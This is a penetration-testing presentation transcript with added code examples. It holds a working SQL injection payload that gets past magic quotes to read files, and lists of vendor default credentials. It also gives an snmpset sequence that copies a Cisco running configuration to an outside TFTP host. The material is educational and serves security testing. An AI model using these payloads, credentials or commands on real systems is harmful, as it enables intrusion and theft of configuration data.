Penetration testing, What’s this?

Presentation Transcript

  • Penetration testing: What’s this? Dmitry Evteev (Positive Technologies)
  • Penetration testing internals
    • Penetration testing != simulation of (un)real attacker activities
    • Penetration testing != instrumental scanning with manual vulnerability verification
    • Penetration testing
      • is a set of activities aimed at assessing the current state of security processes;
      • is testing whether protection mechanisms can be bypassed;
      • is one of the security audit methods.
  • Methodology
    • On the one hand, the following best practices are used:
      • Open Source Security Testing Methodology Manual (OSSTMM)
      • Web Application Security Consortium (WASC)
      • Open Web Application Security Project (OWASP)
    • On the other hand, the following standards are used:
      • Center for Internet Security (CIS) guides
      • ISO 2700x series standards
  • Abilities
    [table, only fragments survived extraction: rows are protection mechanisms N … X; the "Incident management" row reads: some activities were detected but not identified as an attack]
  • Aims
    • High-level
      • Internal policy (pentest as an instrument of pressure)
      • Assessment of current security processes
      • Required (compliance)
    • Technological
      • Get unauthorized access to the internal network from the Internet
      • Gain maximum privileges in the main infrastructure systems (Active Directory, network hardware, DBMS, ERP, etc.)
      • Get access to certain information resources
      • Get access to certain data (information)
  • Approaches
    • Perimeter pentest (with further attacks on the internal network)
      • With or without administrator awareness
      • Wireless network security analysis
    • Internal pentest
      • From an average user's workstation
      • From a chosen network segment
    • Testing of a particular information system component (security analysis)
      • Black, Grey and White Box
    • Assessment of employee information security awareness
  • Real attack vs. penetration testing
    • For the person actually executing it, a pentest is HACKING!
    • Limitations
      • Compliance with Russian Federation legislation
      • Limited time
      • Minimum impact
      • No testing of the DDoS kind
    • Inconveniences
      • Coordination of actions (this can reach absurd extremes!)
      • Responsibility/Punctuality
    • Advantages
      • No need to hide the activities
      • Simplified network perimeter identification
      • A possibility to use Grey and White Box methods
  • Instruments
    • Positive Technologies MaxPatrol
    • Nmap/dnsenum/dig …
    • Immunity Canvas (VulnDisco, Agora Pack, Voip Pack)
    • Metasploit
    • THC Hydra/THC PPTP bruter/ncrack …
    • Cain and Abel/Wireshark
    • Aircrack
    • Yersinia
    • Browser, notepad …
  • Web application security problem
    • The most frequent web application vulnerabilities detected by the Black Box method (2009 statistics, http://ptsecurity.ru/analytics.asp)
  • Pentest example: web applications
    • What does a Black Box web application pentest look like? (real world)
    [diagram: the auditor's workstation runs Check 1 … Check N against the web server until a vulnerability is detected]
    • Vulnerability 1: password bruteforce. Impact: access to the application (with limited privileges)
    • Vulnerability 2: SQL injection. Impact: file reading only (the magic_quotes option is enabled, so quoted string literals cannot be injected)
    • Vulnerability 3: path traversal. Impact: file reading only (potentially LFI)
    • Vulnerability 4: predictable identifier of an uploaded file. Vulnerability 3 + Vulnerability 4 = Impact: command execution on the server
    • Next step: FURTHER ATTACK
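Why "Vulnerability 2" stops at file reading is worth seeing concretely. The following is an added example, not code from the presentation: it emulates in SQLite what the slide describes for a PHP + MySQL application with magic_quotes_gpc enabled. Magic quotes backslash-escape every quote in the request, so any payload that needs a string literal is broken, but a payload that spells its string without quotes (in MySQL, a hex literal such as 0x2f6574632f706173737764, or CHAR(47,101,...) as used here because SQLite has no bare hex-string literal) still reaches LOAD_FILE(). The news table, the jailed LOAD_FILE() user function and the sample /etc/passwd are all constructed for the demonstration.

```python
"""Emulation of a MySQL-style SQL injection under magic_quotes_gpc (added example)."""
import os
import sqlite3
import tempfile


def magic_quotes(value: str) -> str:
    """Emulate PHP magic_quotes_gpc / addslashes(): backslash-escape ' " \\ and NUL."""
    escaped = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            escaped.append("\\" + ch)
        elif ch == "\x00":
            escaped.append("\\0")
        else:
            escaped.append(ch)
    return "".join(escaped)


def char_encode(text: str) -> str:
    """Spell a string as CHAR(n,n,...) so the SQL contains no quote characters."""
    return "CHAR(" + ",".join(str(ord(c)) for c in text) + ")"


def build_app(jail: str) -> sqlite3.Connection:
    """Constructed stand-in for the vulnerable application's database.

    LOAD_FILE() is registered as a user function that reads files relative to
    `jail`, imitating MySQL's LOAD_FILE() without touching the real filesystem root.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(1, "first post"), (2, "second post")])

    def load_file(path):
        if isinstance(path, bytes):
            path = path.decode()
        full = os.path.join(jail, path.lstrip("/"))
        try:
            with open(full, encoding="utf-8") as fh:
                return fh.read()
        except OSError:
            return None  # MySQL's LOAD_FILE() also returns NULL when it cannot read the file

    conn.create_function("LOAD_FILE", 1, load_file)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, news_id: str):
    """The bug: the magic-quoted parameter is concatenated into a numeric context."""
    sql = "SELECT title FROM news WHERE id = " + magic_quotes(news_id)
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc


def demo():
    """Run both payloads; returns (result of quoted payload, result of unquoted payload)."""
    jail = tempfile.mkdtemp()
    os.makedirs(os.path.join(jail, "etc"))
    with open(os.path.join(jail, "etc", "passwd"), "w", encoding="utf-8") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample file
    conn = build_app(jail)

    # Classic payload with a string literal: magic quotes turn ' into \' and the query breaks.
    quoted = vulnerable_lookup(conn, "1 UNION SELECT LOAD_FILE('/etc/passwd')")
    # Same attack with the path encoded without quotes: nothing for magic quotes to escape.
    unquoted = vulnerable_lookup(conn, "0 UNION SELECT LOAD_FILE(" + char_encode("/etc/passwd") + ")")
    return quoted, unquoted


if __name__ == "__main__":
    quoted, unquoted = demo()
    print("quoted payload  :", quoted)
    print("unquoted payload:", unquoted)
```

The write direction has no such escape hatch: MySQL's SELECT ... INTO OUTFILE accepts only a quoted string literal as the file name, so with magic quotes in place the injection cannot drop a web shell, which is exactly why the slide records the impact as "file reading only".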
  • Weak password problem
    • The recommended password policy is in use
    • What is the domain administrator's password?
    • (the same as the login)
  • Pentest example: Password bruteforce (defaults)
    • Well known
      • admin:123456
      • Administrator:P@ssw0rd
    • SAP
      • (DIAG) SAP*: 06071992, PASS
      • clients (Mandanten): 000, 001, 066, every newly created one
      • (RFC) SAPCPIC: ADMIN
      • clients (Mandanten): 000, 001, 066, every newly created one
    • Oracle
      • system:manager
      • sys:change_on_install
    • Cisco
      • cisco:cisco
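The two slides above make one point: a password policy was enforced, and the domain administrator's password was still the login, while vendor defaults such as P@ssw0rd sail through every complexity rule. The checker below is an added example, not from the presentation; it applies a constructed approximation of a typical corporate policy (minimum length 8, three of four character classes; not any vendor's exact rule) and then the checks a pentester runs first: password equal to the login, the defaults listed on the slide (Oracle's pair written as SYSTEM/MANAGER, as in Oracle's documentation), well-known passwords, and dictionary words with leet substitutions. The dictionary, leet map and sample accounts are constructed.

```python
"""Policy-compliant yet trivially guessable passwords (added example)."""
import string

# (login, password) pairs from the presentation's defaults slide, lower-cased for comparison.
DEFAULT_CREDS = {
    ("admin", "123456"),
    ("administrator", "p@ssw0rd"),
    ("sap*", "06071992"),
    ("sap*", "pass"),
    ("sapcpic", "admin"),
    ("system", "manager"),
    ("sys", "change_on_install"),
    ("cisco", "cisco"),
}
DEFAULT_PASSWORDS = {pw for _, pw in DEFAULT_CREDS}

# Constructed, deliberately short dictionary and leet map for the substitution check.
COMMON_WORDS = {"password", "admin", "manager", "welcome", "qwerty", "secret"}
LEET = str.maketrans({"@": "a", "0": "o", "$": "s", "1": "i", "!": "i",
                      "3": "e", "4": "a", "5": "s", "7": "t"})


def meets_policy(password: str, min_length: int = 8) -> bool:
    """Typical corporate policy: minimum length and three of four character classes.

    Constructed approximation of such a policy, not a vendor's exact rule.
    """
    classes = (
        any(c.islower() for c in password),
        any(c.isupper() for c in password),
        any(c.isdigit() for c in password),
        any(c in string.punctuation for c in password),
    )
    return len(password) >= min_length and sum(classes) >= 3


def normalize(password: str) -> str:
    """Strip trailing digits/punctuation and undo common leet substitutions."""
    base = password.lower().rstrip(string.digits + string.punctuation)
    return base.translate(LEET)


def pentester_verdict(login: str, password: str) -> str:
    """Checks in the order a pentester tries them: login as password, vendor defaults,
    well-known passwords, dictionary words with substitutions."""
    l, p = login.lower(), password.lower()
    if p == l:
        return "password equals login"
    if (l, p) in DEFAULT_CREDS:
        return "vendor default"
    if p in DEFAULT_PASSWORDS:
        return "well-known password"
    if normalize(password) in COMMON_WORDS:
        return "dictionary word with substitutions"
    return "ok"


def audit(accounts):
    """For each (login, password): does it satisfy the policy, and what would a pentester find?"""
    return [(login, meets_policy(pw), pentester_verdict(login, pw)) for login, pw in accounts]


# Constructed sample accounts (not real credentials).
SAMPLE_ACCOUNTS = [
    ("Administrator", "P@ssw0rd"),   # passes the policy, is a vendor default
    ("Svc_Backup1", "Svc_Backup1"),  # passes the policy, equals the login
    ("jdoe", "Welcome1!"),           # passes the policy, is "welcome" in disguise
    ("ivanov", "Zx!9qLm2"),          # passes the policy and nothing cheap finds it
]

if __name__ == "__main__":
    for login, policy_ok, verdict in audit(SAMPLE_ACCOUNTS):
        print(f"{login:15} policy={'pass' if policy_ok else 'fail'}  pentester: {verdict}")
```

Every account in the sample list satisfies the policy; three of the four fall to the first things an attacker tries. Complexity rules are a filter on the character set, not on guessability, which is why the defaults and login-equals-password checks belong in the policy enforcement path, not only in the pentest report.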
  • Pentest example: Hello, Pavlik :)
    • With a writable SNMP community (here the default "private"), CISCO-CONFIG-COPY-MIB lets anyone copy the running configuration to a TFTP server of their choosing. Each OID below is one column of ccCopyEntry in a row with the arbitrary index 31337:
    snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1              # ccCopyProtocol = tftp(1)
    snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4              # ccCopySourceFileType = runningConfig(4)
    snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1              # ccCopyDestFileType = networkFile(1)
    snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host>    # ccCopyServerAddress = the auditor's TFTP server
    snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config  # ccCopyFileName = file name on the TFTP server
    snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1             # ccCopyEntryRowStatus = active(1): starts the copy
    snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6             # ccCopyEntryRowStatus = destroy(6): remove the row once the copy has completed
  • The problem of access control
    • Network access
      • Network architecture (DMZ, technological network, user segment, testing environment)
      • Remote network access
    • Data access
      • Shared resources (passwords in clear text, backup copies, other sensitive data)
      • Web applications, DBMS, ERP
  • The problem of access control (continued)
    • Division of privileges among administrators
    • Users with extended privileges
    • Services (!) with more access than they require
    • The general problem of identity and account management
  • Pentest example: Use of vulnerabilities
    • CANVAS && Metasploit
  • Pentest example: Privilege escalation in Active Directory
    • Version 1: Password bruteforce
    • Version 2: Vulnerabilities in domain controller services
    • Version 3: Pass-the-hash attack
    • Version 4: Create a new user from a domain computer
    • Version 5: ARP cache poisoning (for example, hijack an RDP session, downgrade authentication to LM)
    • Version 6: NTLM relay attack
    • Version 7: Find and restore the domain's System State backup (for example, after a successful attack on the backup server)
    • Version 8: Get extended privileges via other systems (for example, control over records in the company's root DNS)
    • Version 9: Get extended privileges via other systems' vulnerabilities (passwords stored with reversible encryption, insecure protocols in use, etc.)
    • Version N …
  • Pentest example: Security analysis (attack chain)
    • Network scanning
    • Password bruteforced!
    • Exploitation of SQL injection
    • Command execution on the server
    • Privilege gaining
    • Attack on internal resources
    • Internal pentest
    • Install the MaxPatrol scanner
    • Find vulnerabilities
    • Exploit vulnerabilities
    • Move to the Head office network
    • Conduct attacks on Head office resources
    • Get maximum privileges in the whole network!
  • Pentest example: Wireless networks
  • Pentest example: Assessment of awareness program efficiency
    • Send provocative messages via e-mail
    • Send provocative messages via ICQ (and other IM)
    • Distribute data media with provocative messages
    • Question employees
    • Conversations (telephone, Skype)
  • Pentest example: Example of a set of checks
    • Check 1
      • Message: an e-mail from a person in authority with an attached executable file.
      • Attacks modeled: spread of network worms; system infection with a Trojan horse.
      • Monitored events: open the mailbox; execute the attached file.
    • Check 2
      • Message: an e-mail from an internal person with a link to a web site; the link points to an executable file.
      • Attacks modeled: phishing attacks; spread of network worms; system infection with a Trojan horse; attacks through software vulnerabilities.
      • Monitored events: open the mailbox; download the file from the web server; execute the file.
    • Check 3
      • Message: an e-mail from a person in authority with a link to a web site.
      • Attacks modeled: phishing attacks; spread of network worms; system infection with a Trojan horse; attacks through software vulnerabilities.
      • Monitored events: open the mailbox; follow the link.
  • Pentest example: Assessment of awareness program efficiency
    [chart: share of users that follow the link after a single pentest vs. after regular pentests]
  • Conclusions
    • Penetration testing is a set of activities that allows an efficient assessment of current security processes
    • Penetration testing is the search for and exploitation of flaws in security processes:
      • vulnerability management
      • configuration management
      • incident management
      • security management of web applications, DBMS, ERP, wired and wireless networks, etc.
  • Thank you for your attention! Any questions? [email_address] http://devteev.blogspot.com/